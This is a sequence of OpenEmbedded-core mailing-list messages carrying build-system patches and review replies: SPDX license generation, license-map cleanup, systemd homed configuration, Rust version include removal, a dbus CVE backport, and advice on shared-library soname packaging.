Re: [OE-core] [PATCH v2 4/4] create-spex: don't duplicate license texts in each package
> -Original Message- > From: openembedded-core@lists.openembedded.org c...@lists.openembedded.org> On Behalf Of Ross Burton > Sent: den 3 september 2021 18:01 > To: openembedded-core@lists.openembedded.org > Subject: [OE-core] [PATCH v2 4/4] create-spex: don't duplicate license Change "create-spex" to "create-spdx". //Peter > texts in each package > > Instead of putting the full license text for non-SPDX licenses into the > recipe and every package, use links to the recipe from the packages if > possible. > > Signed-off-by: Ross Burton > --- > meta/classes/create-spdx.bbclass | 25 ++--- > 1 file changed, 14 insertions(+), 11 deletions(-) > > diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create- > spdx.bbclass > index cbb9239991c..1e0b3605587 100644 > --- a/meta/classes/create-spdx.bbclass > +++ b/meta/classes/create-spdx.bbclass > @@ -50,7 +50,7 @@ python() { > d.setVar("SPDX_LICENSE_DATA", data) > } > > -def convert_license_to_spdx(lic, document, d): > +def convert_license_to_spdx(lic, document, d, existing={}): > from pathlib import Path > import oe.spdx > > @@ -109,8 +109,11 @@ def convert_license_to_spdx(lic, document, d): > if spdx_license in license_data["licenses"]: > return spdx_license > > -spdx_license = "LicenseRef-" + l > -add_extracted_license(spdx_license, l) > +try: > +spdx_license = existing[l] > +except KeyError: > +spdx_license = "LicenseRef-" + l > +add_extracted_license(spdx_license, l) > > return spdx_license > > @@ -462,7 +465,14 @@ python do_create_spdx() { > doc_sha1 = oe.sbom.write_doc(d, doc, "recipes") > dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe)) > > +recipe_ref = oe.spdx.SPDXExternalDocumentRef() > +recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name > +recipe_ref.spdxDocument = doc.documentNamespace > +recipe_ref.checksum.algorithm = "SHA1" > +recipe_ref.checksum.checksumValue = doc_sha1 > + > sources = collect_dep_sources(d, dep_recipes) > +found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + > license.licenseId for license in doc.hasExtractedLicensingInfos} > > if not is_native: > bb.build.exec_func("read_subpackage_metadata", d) > @@ -482,13 +492,6 @@ python do_create_spdx() { > package_doc.creationInfo.creators.append("Tool: OpenEmbedded > Core create-spdx.bbclass") > package_doc.creationInfo.creators.append("Organization: > OpenEmbedded ()") > package_doc.creationInfo.creators.append("Person: N/A ()") > - > -recipe_ref = oe.spdx.SPDXExternalDocumentRef() > -recipe_ref.externalDocumentId = "DocumentRef-recipe-" + > recipe.name > -recipe_ref.spdxDocument = doc.documentNamespace > -recipe_ref.checksum.algorithm = "SHA1" > -recipe_ref.checksum.checksumValue = doc_sha1 > - > package_doc.externalDocumentRefs.append(recipe_ref) > > package_license = d.getVar("LICENSE:%s" % package) or > d.getVar("LICENSE") > @@ -498,7 +501,7 @@ python do_create_spdx() { > spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name) > spdx_package.name = pkg_name > spdx_package.versionInfo = d.getVar("PV") > -spdx_package.licenseDeclared = > convert_license_to_spdx(package_license, package_doc, d) > +spdx_package.licenseDeclared = > convert_license_to_spdx(package_license, package_doc, d, found_licenses) > > package_doc.packages.append(spdx_package) > > -- > 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155688): https://lists.openembedded.org/g/openembedded-core/message/155688 Mute This Topic: https://lists.openembedded.org/mt/85355094/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH] common-licenses, licenses.conf: Remove duplicate licenses
This removes BSD-0-Clause, Nauman, tcl and vim and adds mappings for them to their SPDX counterparts (0BSD, Naumen, TCL and Vim). It also removes FreeType, which already had a mapping to FTL. Signed-off-by: Peter Kjellerstedt --- In case anyone is interested, the following command (executed in meta/files/common-licenses) can be used to list all licenses that are not present in spdx-licenses.json: ls | grep -Ev "^($(sed -nre 's/.*"licenseId": "(.*)".*/\1/p' ../../files/spdx-licenses.json | sort | tr '\n' '|'))\$" meta/conf/licenses.conf | 30 +++-- meta/files/common-licenses/BSD-0-Clause | 12 -- meta/files/common-licenses/FreeType | 170 meta/files/common-licenses/Nauman | 50 --- meta/files/common-licenses/tcl | 40 -- meta/files/common-licenses/vim | 81 --- 6 files changed, 18 insertions(+), 365 deletions(-) delete mode 100644 meta/files/common-licenses/BSD-0-Clause delete mode 100644 meta/files/common-licenses/FreeType delete mode 100644 meta/files/common-licenses/Nauman delete mode 100644 meta/files/common-licenses/tcl delete mode 100644 meta/files/common-licenses/vim diff --git a/meta/conf/licenses.conf b/meta/conf/licenses.conf index e2bd58f84a..991fb6cc23 100644 --- a/meta/conf/licenses.conf +++ b/meta/conf/licenses.conf @@ -19,6 +19,9 @@ SPDXLICENSEMAP[AGPLv3.0+] = "AGPL-3.0-or-later" SPDXLICENSEMAP[AGPL-3.0] = "AGPL-3.0-only" SPDXLICENSEMAP[AGPL-3.0+] = "AGPL-3.0-or-later" +# BSD variations +SPDXLICENSEMAP[BSD-0-Clause] = "0BSD" + # GPL variations SPDXLICENSEMAP[GPL-1] = "GPL-1.0-only" SPDXLICENSEMAP[GPL-1+] = "GPL-1.0-or-later" @@ -45,7 +48,7 @@ SPDXLICENSEMAP[GPLv3.0+] = "GPL-3.0-or-later" SPDXLICENSEMAP[GPL-3.0] = "GPL-3.0-only" SPDXLICENSEMAP[GPL-3.0+] = "GPL-3.0-or-later" -#LGPL variations +# LGPL variations SPDXLICENSEMAP[LGPLv2] = "LGPL-2.0-only" SPDXLICENSEMAP[LGPLv2+] = "LGPL-2.0-or-later" SPDXLICENSEMAP[LGPLv2.0] = "LGPL-2.0-only" @@ -63,49 +66,52 @@ SPDXLICENSEMAP[LGPLv3+] = "LGPL-3.0-or-later" SPDXLICENSEMAP[LGPL-3.0] = "LGPL-3.0-only" SPDXLICENSEMAP[LGPL-3.0+] = "LGPL-3.0-or-later" -#MPL variations +# MPL variations SPDXLICENSEMAP[MPL-1] = "MPL-1.0" SPDXLICENSEMAP[MPLv1] = "MPL-1.0" SPDXLICENSEMAP[MPLv1.1] = "MPL-1.1" SPDXLICENSEMAP[MPLv2] = "MPL-2.0" -#MIT variations +# MIT variations SPDXLICENSEMAP[MIT-X] = "MIT" SPDXLICENSEMAP[MIT-style] = "MIT" -#Openssl variations +# Openssl variations SPDXLICENSEMAP[openssl] = "OpenSSL" -#PSF variations +# PSF variations SPDXLICENSEMAP[PSF] = "PSF-2.0" SPDXLICENSEMAP[PSFv2] = "PSF-2.0" -#Python variations +# Python variations SPDXLICENSEMAP[Python-2] = "Python-2.0" -#Apache variations +# Apache variations SPDXLICENSEMAP[Apachev2] = "Apache-2.0" SPDXLICENSEMAP[Apache-2] = "Apache-2.0" -#Artistic variations +# Artistic variations SPDXLICENSEMAP[Artisticv1] = "Artistic-1.0" SPDXLICENSEMAP[Artistic-1] = "Artistic-1.0" -#Academic variations +# Academic variations SPDXLICENSEMAP[AFL-2] = "AFL-2.0" SPDXLICENSEMAP[AFL-1] = "AFL-1.2" SPDXLICENSEMAP[AFLv2] = "AFL-2.0" SPDXLICENSEMAP[AFLv1] = "AFL-1.2" -#CDDL variations +# CDDL variations SPDXLICENSEMAP[CDDLv1] = "CDDL-1.0" SPDXLICENSEMAP[CDDL-1] = "CDDL-1.0" -#Other variations +# Other variations SPDXLICENSEMAP[EPLv1.0] = "EPL-1.0" SPDXLICENSEMAP[FreeType] = "FTL" +SPDXLICENSEMAP[Nauman] = "Naumen" +SPDXLICENSEMAP[tcl] = "TCL" +SPDXLICENSEMAP[vim] = "Vim" -#Silicon Graphics variations +# Silicon Graphics variations SPDXLICENSEMAP[SGIv1] = "SGI-1" # Additional license directories. Add your custom licenses directories this path. diff --git a/meta/files/common-licenses/BSD-0-Clause b/meta/files/common-licenses/BSD-0-Clause deleted file mode 100644 index 328bdd6aee..00 --- a/meta/files/common-licenses/BSD-0-Clause +++ /dev/null @@ -1,12 +0,0 @@ -Copyright (C) by - -Permission to use, copy, modify, and/or distribute this software for any -purpose with or without fee is hereby granted. - -THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. diff --git a/meta/files/common-licenses/FreeType b/meta/files/common-licenses/FreeType deleted file mode 100644 index 349f3e..00 --- a/meta/files/common-licenses/FreeType +++ /dev/null @@ -1,170 +0,0 @@ -The FreeType Project LICENSE - - -2006-Jan-27 - -Copyright 1996-2002, 2006 by - David Turner, Robert Wilhelm, and Werner
[OE-core] [PATCH v2] systemd: Add homed PACKAGECONFIG
If systemd is built with fdisk support[1] and the openssl and cryptsetup PACKAGECONFIG are enabled, systemd-homed[1] is automatically enabled. The org.freedesktop.home1.conf file was forgotten, so this commit adds the file and make enabling homed a explicit choice. systemd-homed.service and systemd-homed-activate.service have a Also= on each other, so "systemctl" has been fixed to handle the circular dependency. userdb isn't strictly speaking needed for homed but "systemctl" can't handle the missing unit file and upstream recommend enabling both[3]. [1] Automatically enabled if the fdisk dependency is installed which it is as util-linux is pulled in by systemd [2] https://www.freedesktop.org/software/systemd/man/systemd-homed.service.html [3] https://github.com/systemd/systemd/commit/871dc8d644eef7542a5330f84c25b1db2617317c Signed-off-by: Kristian Klausen --- V2: Handle circular dependency in systemctl proberly. Also require PACKAGECONFIG[userdb] meta/recipes-core/systemd/systemd-systemctl/systemctl | 5 +++-- meta/recipes-core/systemd/systemd_249.3.bb| 5 + 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/meta/recipes-core/systemd/systemd-systemctl/systemctl b/meta/recipes-core/systemd/systemd-systemctl/systemctl index e8c3d2d1ee..6324319a45 100755 --- a/meta/recipes-core/systemd/systemd-systemctl/systemctl +++ b/meta/recipes-core/systemd/systemd-systemctl/systemctl @@ -191,7 +191,7 @@ class SystemdUnit(): except KeyError: pass -def enable(self): +def enable(self, caller_unit=None): # if we're enabling an instance, first extract the actual instance # then figure out what the template unit is template = re.match(r"[^@]+@(?P[^\.]*)\.", self.unit) @@ -227,7 +227,8 @@ class SystemdUnit(): try: for also in config.get('Install', 'Also'): try: -SystemdUnit(self.root, also).enable() +if caller_unit != also: +SystemdUnit(self.root, also).enable(unit) except SystemdUnitNotFoundError as e: sys.exit("Error: Systemctl also enable issue with %s (%s)" % (service, e.unit)) diff --git a/meta/recipes-core/systemd/systemd_249.3.bb b/meta/recipes-core/systemd/systemd_249.3.bb index c2d4343f10..e848eea361 100644 --- a/meta/recipes-core/systemd/systemd_249.3.bb +++ b/meta/recipes-core/systemd/systemd_249.3.bb @@ -133,6 +133,7 @@ PACKAGECONFIG[gnu-efi] = "-Dgnu-efi=true -Defi-libdir=${STAGING_LIBDIR} -Defi-in PACKAGECONFIG[elfutils] = "-Delfutils=true,-Delfutils=false,elfutils" PACKAGECONFIG[firstboot] = "-Dfirstboot=true,-Dfirstboot=false" PACKAGECONFIG[repart] = "-Drepart=true,-Drepart=false" +PACKAGECONFIG[homed] = "-Dhomed=true,-Dhomed=false" # Sign the journal for anti-tampering PACKAGECONFIG[gcrypt] = "-Dgcrypt=true,-Dgcrypt=false,libgcrypt" PACKAGECONFIG[gnutls] = "-Dgnutls=true,-Dgnutls=false,gnutls" @@ -619,6 +620,7 @@ FILES:${PN} = " ${base_bindir}/* \ ${datadir}/dbus-1/system.d/org.freedesktop.timesync1.conf \ ${datadir}/dbus-1/system.d/org.freedesktop.portable1.conf \ ${datadir}/dbus-1/system.d/org.freedesktop.oom1.conf \ +${datadir}/dbus-1/system.d/org.freedesktop.home1.conf \ " FILES:${PN}-dev += "${base_libdir}/security/*.la ${datadir}/dbus-1/interfaces/ ${sysconfdir}/rpm/macros.systemd" @@ -717,6 +719,9 @@ python __anonymous() { if bb.utils.contains('PACKAGECONFIG', 'repart', True, False, d) and not bb.utils.contains('PACKAGECONFIG', 'openssl', True, False, d): bb.error("PACKAGECONFIG[repart] requires PACKAGECONFIG[openssl]") + +if bb.utils.contains('PACKAGECONFIG', 'homed', True, False, d) and not bb.utils.contains('PACKAGECONFIG', 'userdb openssl cryptsetup', True, False, d): +bb.error("PACKAGECONFIG[homed] requires PACKAGECONFIG[userdb], PACKAGECONFIG[openssl] and PACKAGECONFIG[cryptsetup]") } python do_warn_musl() { -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155686): https://lists.openembedded.org/g/openembedded-core/message/155686 Mute This Topic: https://lists.openembedded.org/mt/85362707/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
Re: [OE-core] [Dunfell][PATCH] dbus: Security fix CVE-2020-35512
On 9/2/21 7:55 PM, Steve Sakoman wrote: > On Thu, Sep 2, 2021 at 8:38 AM Steve Sakoman wrote: >> On Thu, Sep 2, 2021 at 8:10 AM Armin Kuster wrote: >>> ping or did I miss a response to this patch? >> No you didn't miss anything! >> >> I mistakenly stashed this patch along with your "lz4: Security Fix for >> CVE-2021-3520" patch in a branch waiting for the lz4 equivalent to hit >> master. >> >> Richard pushed the lz4 patch to master so now both patches are merged >> and in test for dunfell. > We're getting reproducible autobuilder ptest errors with this patch: > > AssertionError: Failed ptests: > {'dbus-test': ['test/test-dbus-daemon', >'test/test-dbus-daemon-eavesdrop', >'test/test-monitor']} Hmm. What is odd the dbus-daemon does run on the target. I can reproduce this locally. will dig into -armin > > https://autobuilder.yoctoproject.org/typhoon/#/builders/82/builds/2179 > https://autobuilder.yoctoproject.org/typhoon/#/builders/81/builds/2460 > > Steve > >>> -armin >>> >>> On 8/27/21 8:37 PM, Armin Kuster via lists.openembedded.org wrote: From: Armin Kuster Source: https://gitlab.freedesktop.org/dbu MR: 108825 Type: Security Fix Disposition: Backport from https://gitlab.freedesktop.org/dbus/dbus/-/commit/e75c67a28fa2bc41a8ab0de433a52355c71a8abf ChangeID: dea9518b9c13dab66e7d553c622000b9c6e268cc Description: Affects: < 1.12.20 Signed-off-by: Armin Kuster --- .../dbus/dbus/CVE-2020-35512.patch| 301 ++ meta/recipes-core/dbus/dbus_1.12.16.bb| 1 + 2 files changed, 302 insertions(+) create mode 100644 meta/recipes-core/dbus/dbus/CVE-2020-35512.patch diff --git a/meta/recipes-core/dbus/dbus/CVE-2020-35512.patch b/meta/recipes-core/dbus/dbus/CVE-2020-35512.patch new file mode 100644 index 00..27f5d58675 --- /dev/null +++ b/meta/recipes-core/dbus/dbus/CVE-2020-35512.patch @@ -0,0 +1,301 @@ +From 2b7948ef907669e844b52c4fa2268d6e3162a70c Mon Sep 17 00:00:00 2001 +From: Simon McVittie +Date: Tue, 30 Jun 2020 19:29:06 +0100 +Subject: [PATCH] userdb: Reference-count DBusUserInfo, DBusGroupInfo + +Previously, the hash table indexed by uid (or gid) took ownership of the +single reference to the heap-allocated struct, and the hash table +indexed by username (or group name) had a borrowed pointer to the same +struct that exists in the other hash table. + +However, this can break down if you have two or more distinct usernames +that share a numeric identifier. This is generally a bad idea, because +the user-space model in such situations does not match the kernel-space +reality, and in particular there is no effective kernel-level security +boundary between such users, but it is sometimes done anyway. + +In this case, when the second username is looked up in the userdb, it +overwrites (replaces) the entry in the hash table that is indexed by +uid, freeing the DBusUserInfo. This results in both the key and the +value in the hash table that is indexed by username becoming dangling +pointers (use-after-free), leading to undefined behaviour, which is +certainly not what we want to see when doing access control. + +An equivalent situation can occur with groups, in the rare case where +a numeric group ID has two names (although I have not heard of this +being done in practice). + +Solve this by reference-counting the data structure. There are up to +three references in practice: one held temporarily while the lookup +function is populating and storing it, one held by the hash table that +is indexed by uid, and one held by the hash table that is indexed by +name. + +Closes: dbus#305 +Signed-off-by: Simon McVittie + +Upsteam-Status: Backport +https://gitlab.freedesktop.org/dbus/dbus/-/commit/e75c67a28fa2bc41a8ab0de433a52355c71a8abf +CVE: CVE-2020-35512 +Signed-off-by: Armin Kuster + +--- + dbus/dbus-sysdeps-unix.h | 2 ++ + dbus/dbus-userdb-util.c | 38 ++- + dbus/dbus-userdb.c | 67 ++-- + dbus/dbus-userdb.h | 6 ++-- + 4 files changed, 86 insertions(+), 27 deletions(-) + +Index: dbus-1.12.16/dbus/dbus-sysdeps-unix.h +=== +--- dbus-1.12.16.orig/dbus/dbus-sysdeps-unix.h dbus-1.12.16/dbus/dbus-sysdeps-unix.h +@@ -105,6 +105,7 @@ typedef struct DBusGroupInfo DBusGroupIn + */ + struct DBusUserInfo + { ++ size_t refcount; /**< Reference count */ + dbus_uid_t uid;/**< UID */ + dbus_gid_t primary_gid;/**< GID */ + dbus_gid_t *group_ids; /**<
Re: [OE-core] [PATCH] rust: remove rust_versions.inc since there can be only one.
On 9/3/21 9:20 AM, Randy MacLeod wrote: oe-core has only one version of the Rust toolchain, so remove the ability to change versions. This file belongs in the meta-rust layer. I think we should still keep it around. For external rust toolchains much like we do for gcc, but move it to meta/conf/distro/include/tcmode-default.inc Signed-off-by: Randy MacLeod --- meta/conf/distro/include/rust_versions.inc | 13 - 1 file changed, 13 deletions(-) delete mode 100644 meta/conf/distro/include/rust_versions.inc diff --git a/meta/conf/distro/include/rust_versions.inc b/meta/conf/distro/include/rust_versions.inc deleted file mode 100644 index a11ba22a8f..00 --- a/meta/conf/distro/include/rust_versions.inc +++ /dev/null @@ -1,13 +0,0 @@ -# include this in your distribution to easily switch between versions -# just by changing RUST_VERSION variable - -RUST_VERSION ?= "1.51.0" - -PREFERRED_VERSION_cargo ?= "${RUST_VERSION}" -PREFERRED_VERSION_cargo-native ?= "${RUST_VERSION}" -PREFERRED_VERSION_libstd-rs ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust-cross-${TARGET_ARCH} ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust-llvm ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust-llvm-native ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust-native ?= "${RUST_VERSION}" -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155684): https://lists.openembedded.org/g/openembedded-core/message/155684 Mute This Topic: https://lists.openembedded.org/mt/85355685/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH] rust: remove rust_versions.inc since there can be only one.
oe-core has only one version of the Rust toolchain, so remove the ability to change versions. This file belongs in the meta-rust layer. Signed-off-by: Randy MacLeod --- meta/conf/distro/include/rust_versions.inc | 13 - 1 file changed, 13 deletions(-) delete mode 100644 meta/conf/distro/include/rust_versions.inc diff --git a/meta/conf/distro/include/rust_versions.inc b/meta/conf/distro/include/rust_versions.inc deleted file mode 100644 index a11ba22a8f..00 --- a/meta/conf/distro/include/rust_versions.inc +++ /dev/null @@ -1,13 +0,0 @@ -# include this in your distribution to easily switch between versions -# just by changing RUST_VERSION variable - -RUST_VERSION ?= "1.51.0" - -PREFERRED_VERSION_cargo ?= "${RUST_VERSION}" -PREFERRED_VERSION_cargo-native ?= "${RUST_VERSION}" -PREFERRED_VERSION_libstd-rs ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust-cross-${TARGET_ARCH} ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust-llvm ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust-llvm-native ?= "${RUST_VERSION}" -PREFERRED_VERSION_rust-native ?= "${RUST_VERSION}" -- 2.30.2 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155683): https://lists.openembedded.org/g/openembedded-core/message/155683 Mute This Topic: https://lists.openembedded.org/mt/85355685/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
Re: [OE-core] wanting to clarify some shared lib install and packaging issues
On 9/3/21 3:57 AM, Robert P. J. Day wrote: some really basic observations and questions about shared libs from BB recipes as i'm trying to resolve some issues related to a weird hybrid build system that overrides the standard do_install() task by manually populating the "image" directory for each recipe, then hands control over to bitbake to take it from there. first, quick review as i am going to have to explain all this to some folks, so let's make sure i don't sound like an idiot. from the explanation here: https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html when a BB recipe creates a shared lib, i typically expect to see the following under image/usr/lib/ (example from "nettle" directory building for aarch64): libhogweed.so -> libhogweed.so.6.4 [linker name] libhogweed.so.6 -> libhogweed.so.6.4[soname] libhogweed.so.6.4 [real name, actual lib] based on default packaging defined in bitbake.conf, i then expect to see the "base" package "nettle" install the following on the target: libhogweed.so.6 -> libhogweed.so.6.4 libhogweed.so.6.4 while the development package nettle-dev will contain support the linker name linking to, well, one of the above: libhogweed.so -> libhogweed.so.6.4 so far, nothing interesting, but this packaging means that, on the target, if something needs to link against the libhogweed library, it would normally link using the soname, "libhogweed.so.6", so a file by that name *must* exist on the target and, normally, it does (even if it's a symlink). here's what i just ran into -- this hybrid system that bypasses the normal BB install step and manually populates the image directory makes a bit of a mess with setting the symlinks and names properly, but this was "fixed" by totally redefining the standard recipe packaging, so that *all* shared lib files (all three forms) were stuffed into the base package. and as long as that weird repackaging was in place, everything "worked". along comes me, who really hates this re-definition of what goes into each package as it packages far more for the target than is necessary, and i revert the packaging back to the standard ... and things break, and here's why. you have to be a bit careful while undoing it. one usecase which can break subtly is when some program is trying to dlopen a .so since it maybe just calling it by libfoo.so the end result of the weird hybrid installation and my reverting the packaging is that what ended up on the target in terms of the shared libs was simply: libfubar.so that is, the actual shared lib (not a symlink), but with the linker name, not the soname, which would appear to be the cause of all sorts of things suddenly not running anymore, as a quick inspection showed systemd services trying to start and complaining: ... error while loading shared libraries: libfubar.so.1 ... so i just want to confirm that all of that is due to the shared lib having been packaged and installed on the target via its linker name, not its proper soname, correct? yes without looking at the code and what amends you made, it seems to be the reason. it *seems* like that's all i have to fix, but am i overlooking anything? as long as the shared lib is findable via its soname, should that be the general solution? yeah, let OE installer do the right thing perhaps and fix the odd ones manually in do_install might be a middle way and reduce future maintenance, however watchout for shared libs whose builds might not be using soname versioning strategy. but I guess build time QA should warn about them loudly. rday -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155682): https://lists.openembedded.org/g/openembedded-core/message/155682 Mute This Topic: https://lists.openembedded.org/mt/85348808/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH v2 3/4] create-spdx: embed unknown license texts
For licenses which are not known to SPDX, find and embed the actual license text in an ExtractedLicesingInfo block. Signed-off-by: Ross Burton --- meta/classes/create-spdx.bbclass | 51 +++- 1 file changed, 37 insertions(+), 14 deletions(-) diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass index 529dee22918..cbb9239991c 100644 --- a/meta/classes/create-spdx.bbclass +++ b/meta/classes/create-spdx.bbclass @@ -51,21 +51,49 @@ python() { } def convert_license_to_spdx(lic, document, d): +from pathlib import Path import oe.spdx +available_licenses = d.getVar("AVAILABLE_LICENSES").split() license_data = d.getVar("SPDX_LICENSE_DATA") +extracted = {} -def add_extracted_license(ident, name, text): +def add_extracted_license(ident, name): nonlocal document -spdx_lic = oe.spdx.SPDXExtractedLicensingInfo() -spdx_lic.name = name -spdx_lic.licenseId = ident -spdx_lic.extractedText = text - -document.hasExtractedLicensingInfos.append(spdx_lic) +if name in extracted: +return + +extracted_info = oe.spdx.SPDXExtractedLicensingInfo() +extracted_info.name = name +extracted_info.licenseId = ident + +if name == "PD": +# Special-case this. +extracted_info.extractedText = "Software released to the public domain" +elif name in available_licenses: +# This license can be found in COMMON_LICENSE_DIR or LICENSE_PATH +for directory in [d.getVar('COMMON_LICENSE_DIR')] + d.getVar('LICENSE_PATH').split(): +try: +with (Path(directory) / name).open(errors="replace") as f: +extracted_info.extractedText = f.read() +break +except Exception as e: +# Error out, as the license was in available_licenses so +# should be on disk somewhere. +bb.error(f"Cannot find text for license {name}: {e}") +else: +# If it's not SPDX, or PD, or in available licenses, then NO_GENERIC_LICENSE must be set +filename = d.getVarFlag('NO_GENERIC_LICENSE', name) +if filename: +filename = d.expand("${S}/" + filename) +with open(filename, errors="replace") as f: +extracted_info.extractedText = f.read() +else: +bb.error(f"Cannot find any text for license {name}") -return True +extracted[name] = extracted_info +document.hasExtractedLicensingInfos.append(extracted_info) def convert(l): if l == "(" or l == ")": @@ -82,12 +110,7 @@ def convert_license_to_spdx(lic, document, d): return spdx_license spdx_license = "LicenseRef-" + l - -if l == "PD": -add_extracted_license(spdx_license, l, "Software released to the public domain") -elif add_extracted_license(spdx_license, l, "This software is licensed under the %s license" % l): -pass -#bb.warn("No SPDX License found for %s. Creating a place holder" % l) +add_extracted_license(spdx_license, l) return spdx_license -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155680): https://lists.openembedded.org/g/openembedded-core/message/155680 Mute This Topic: https://lists.openembedded.org/mt/85355093/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH v2 1/4] create-spdx: transform license list into a dict for faster lookups
spdx-licenses.json contains an array of licenses objects. As we'll be searching it often, convert that to a dictionary when we parse it. Signed-off-by: Ross Burton --- meta/classes/create-spdx.bbclass | 15 --- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass index a590ab596ac..73ccb3c990f 100644 --- a/meta/classes/create-spdx.bbclass +++ b/meta/classes/create-spdx.bbclass @@ -44,7 +44,10 @@ python() { return with open(d.getVar("SPDX_LICENSES"), "r") as f: -d.setVar("SPDX_LICENSE_DATA", json.load(f)) +data = json.load(f) +# Transform the license array to a dictionary +data["licenses"] = {l["licenseId"]: l for l in data["licenses"]} +d.setVar("SPDX_LICENSE_DATA", data) } def convert_license_to_spdx(lic, document, d): @@ -55,9 +58,8 @@ def convert_license_to_spdx(lic, document, d): def add_extracted_license(ident, name, text): nonlocal document -for lic_data in license_data["licenses"]: -if lic_data["licenseId"] == ident: -return False +if ident in license_data["licenses"]: +return False spdx_lic = oe.spdx.SPDXExtractedLicensingInfo() spdx_lic.name = name @@ -79,9 +81,8 @@ def convert_license_to_spdx(lic, document, d): return "OR" spdx_license = d.getVarFlag("SPDXLICENSEMAP", l) or l -for lic_data in license_data["licenses"]: -if lic_data["licenseId"] == spdx_license: -return spdx_license +if spdx_license in license_data["licenses"]: +return spdx_license spdx_license = "LicenseRef-" + l -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155679): https://lists.openembedded.org/g/openembedded-core/message/155679 Mute This Topic: https://lists.openembedded.org/mt/85355092/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH v2 4/4] create-spex: don't duplicate license texts in each package
Instead of putting the full license text for non-SPDX licenses into the recipe and every package, use links to the recipe from the packages if possible. Signed-off-by: Ross Burton --- meta/classes/create-spdx.bbclass | 25 ++--- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass index cbb9239991c..1e0b3605587 100644 --- a/meta/classes/create-spdx.bbclass +++ b/meta/classes/create-spdx.bbclass @@ -50,7 +50,7 @@ python() { d.setVar("SPDX_LICENSE_DATA", data) } -def convert_license_to_spdx(lic, document, d): +def convert_license_to_spdx(lic, document, d, existing={}): from pathlib import Path import oe.spdx @@ -109,8 +109,11 @@ def convert_license_to_spdx(lic, document, d): if spdx_license in license_data["licenses"]: return spdx_license -spdx_license = "LicenseRef-" + l -add_extracted_license(spdx_license, l) +try: +spdx_license = existing[l] +except KeyError: +spdx_license = "LicenseRef-" + l +add_extracted_license(spdx_license, l) return spdx_license @@ -462,7 +465,14 @@ python do_create_spdx() { doc_sha1 = oe.sbom.write_doc(d, doc, "recipes") dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe)) +recipe_ref = oe.spdx.SPDXExternalDocumentRef() +recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name +recipe_ref.spdxDocument = doc.documentNamespace +recipe_ref.checksum.algorithm = "SHA1" +recipe_ref.checksum.checksumValue = doc_sha1 + sources = collect_dep_sources(d, dep_recipes) +found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + license.licenseId for license in doc.hasExtractedLicensingInfos} if not is_native: bb.build.exec_func("read_subpackage_metadata", d) @@ -482,13 +492,6 @@ python do_create_spdx() { 